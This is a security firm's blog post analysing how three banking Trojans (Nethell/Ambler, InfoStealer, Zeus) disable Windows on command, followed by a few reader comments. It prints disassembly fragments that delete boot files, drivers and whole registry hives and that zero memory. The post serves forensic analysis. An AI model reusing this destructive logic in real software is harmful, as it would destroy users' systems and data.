Español | English
rss facebook linkedin Twitter

When a Bot master goes mad - Kill the OS

This time we are taking a close look about what things could happen with an infected computer when the running bot receives an specific command about to kill the Operating System. Not all type of bots usually have this functionality, but banking Trojans usually have. We will take three examples (InfoStealer, Zeus/Zbot and Nethell/Ambler), these are the most common Trojans where we've definitely found in their binaries the malicious code that is responsible for the Execution of Windows.


Nethell / Ambler:


Bot commands often can be observed with pure eyes in the binary as simple strings, however not as always trivial as in the case of Nethell:




Looking for the subroutine referencing to the above strings, we arrive to the code that is doing the dirty job:


mov esi, offset aCNtdetect_com ; "C:\\NTDETECT.COM"
push edi
push esi
call
GetFileAttributesA
mov edi, SetFileAttributesA
and al, 0F8h
push eax
push esi
call edi
push esi
call DeleteFileA
mov esi, offset aCNtldr ; "C:\\ntldr"


The code above deletes the files NTDETECT.COM and NTLDR, before deletion, removes the Hidden/System/Read-Only attribute bits. The other botcommand, KILLWINANDREBOOT, calls this same subroutine + immediately tries to do a system reboot.


InfoStealer:


The way of InfoStealer is undoubtedly effective:


push offset aDrivers_sys ; "\\drivers\\*.sys"
push eax ; Dest
call ds:wcscat
push 1 ; hFindFile
push offset delete ; int
lea eax, [ebp+FileName]
push 98967Fh ; int
push eax ; lpFileName
call recursive_findfile
add esp, 18h
call reboot


The subroutine tries to delete each driver within the System32 directory, the first attempt is with a normal delete, in case it fails it is going to call the MoveFileEx API with the flag MOVEFILE_DELAY_UNTIL_REBOOT, which will delete the file upon startup.


InfoStealer also removes necessary registry keys for creating a logon session:


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell = Explorer.exe
UIHost = logonui.exe
HKLM\SYSTEM\CurrentControlSet\Services\DcomLaunch\Parameters
ServiceDll = rpcss.dll
HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters
ServiceDll = rpcss.dll


Zeus / Zbot:


Last but not least here comes the old Zeus. Considering that it requires the less code to execute, nevertheless it is the most aggressive and robust:


push eax

push 80000001h
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+50h]
mov esi, 80000002h
push esi
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+54h]
push esi
call ds:SHDeleteKeyA
push 3E8h
call ds:Sleep
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, ds:buffer
push 0Eh
push dword ptr [eax+30h]
call write_read_namedpipe


It "just" deletes two kind of registry entries, but this will include WHOLE branches:


HKEY_CURRENT_USER,
HKEY_LOCAL_MACHINE\software
HKEY_LOCAL_MACHINE\system


The execution flow does not end up here. After the deletion is finished, it sends a 0E command to its pipe server, where the following code starts zeroing bytes of the virtual memory (4GB):


push 8007h
call eax ; <--- SetErrorMode, to ignore everything
xor eax, eax
mov [eax], eax
xor eax, eax
; from address 0x00000000 - 0xFFFFFFFF
loc_1: mov byte ptr [eax], 0 ; fill the memory with zeros
inc eax
jmp short loc_1


Invoking Zeus' method in our test environment resulted in a B.S.O.D (Blue Screen Of Death).


What could be the possible intention of an attacker to take the victim's computer offline? To disappear and hide all tracks, making further analysis harder? Talking about banking trojans, obviously it is not. As we have seen non of these methods lead to a significant data loss, the trojan binaries are not removed, neither registry startup entries. The point more probably for a phisher is to earn time. Taking the victim away from Internet connection - before the unwanted money transfer is realized and further actions could be taken.

Of course, knowing these informations is not proposed to give tips for anyone how to kill the Windows, indeed hope it may help to roll up some misterious case, and may help forensic analysis.


Jozsef Gegeny
S21sec e-crime


4 comentarios:

Anónimo dijo...

A security expert could have been able to enter the network and blow the trigger in order both to disable the botnet and to alert the users, even if in the hard way.

Anónimo dijo...

Hahahahaha! This is why I like Linux. Viruses can't modify critical system files unless the user stupidly runs as root.

Why the hell do people use Windows when there's no decent file permissions system in place? I think one reason why Windows has over 50,000 buggers is because it's just too easy to break.

I mean, all they need to do is apply a single byte to the file and use an octet-type system to define read/write/execute permissions for each individual file.

Anónimo dijo...
Este comentario ha sido eliminado por un administrador del blog.
Charles dijo...

This is gorgeous!


(+34 902 222 521)


24 horas / 7 días a la semana



© Copyright S21sec 2013 - Todos los derechos reservados


login